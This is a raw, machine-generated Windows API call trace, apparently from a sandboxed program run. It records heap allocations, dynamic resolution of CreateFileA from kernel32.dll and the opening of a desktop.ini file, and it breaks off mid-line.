1 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0174.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c00 [0174.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0174.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0174.022] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0174.022] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0174.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0174.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.022] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0174.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de7e0 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0174.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0174.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0174.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0174.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0174.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0174.023] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0174.023] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0174.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0174.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0174.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0174.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0174.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0174.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0174.024] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0174.024] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0174.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0174.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0174.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0174.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0174.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0174.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0174.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0174.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0174.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0174.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0174.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0174.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0174.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0174.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0174.025] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0174.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0174.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0174.025] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0174.025] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0174.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0174.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0174.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0174.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9b9fb8 [0174.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9b9fb8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0174.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0174.026] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0174.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0174.026] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0174.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0174.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0174.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0174.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0174.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0174.026] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9fb8 [0174.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9b9fb8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0174.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0174.027] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0174.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0174.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0174.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0174.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0174.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0174.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0174.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0174.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1d30 [0174.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0174.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0174.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0174.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xa5f008 [0174.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", cchWideChar=62, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 62 [0174.027] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x3e) returned 0x8db0a8 [0174.027] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", cchWideChar=62, lpMultiByteStr=0x8db0a8, cbMultiByte=62, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini", lpUsedDefaultChar=0x0) returned 62 [0174.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0174.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0174.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0174.027] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0174.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0174.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0174.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0174.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0174.028] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0174.028] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0174.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0174.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0174.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0174.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0174.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0174.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0174.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0174.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0174.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0174.031] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0174.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0174.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0174.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0174.031] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0174.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=62, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0174.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7c) returned 0x9c0b78 [0174.032] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xa5f008, cbMultiByte=62, lpWideCharStr=0x9c0b78, cchWideChar=62 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned 62 [0174.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0174.032] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0c88 [0174.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0174.032] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xa5f008 | out: hHeap=0x8a0000) returned 1 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0174.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0174.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0174.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0174.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0174.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0174.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0174.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0174.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0174.033] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0174.033] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0174.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0174.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0174.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0174.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0174.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0174.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0174.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0174.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0174.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0174.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0174.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0174.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0174.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0174.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0174.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdaf8 [0174.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0174.034] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0174.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0174.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0174.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdaf8 | out: hHeap=0x8a0000) returned 1 [0174.034] FreeLibrary (hLibModule=0x75990000) returned 1 [0174.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0174.034] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0174.035] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba270 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0174.036] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | 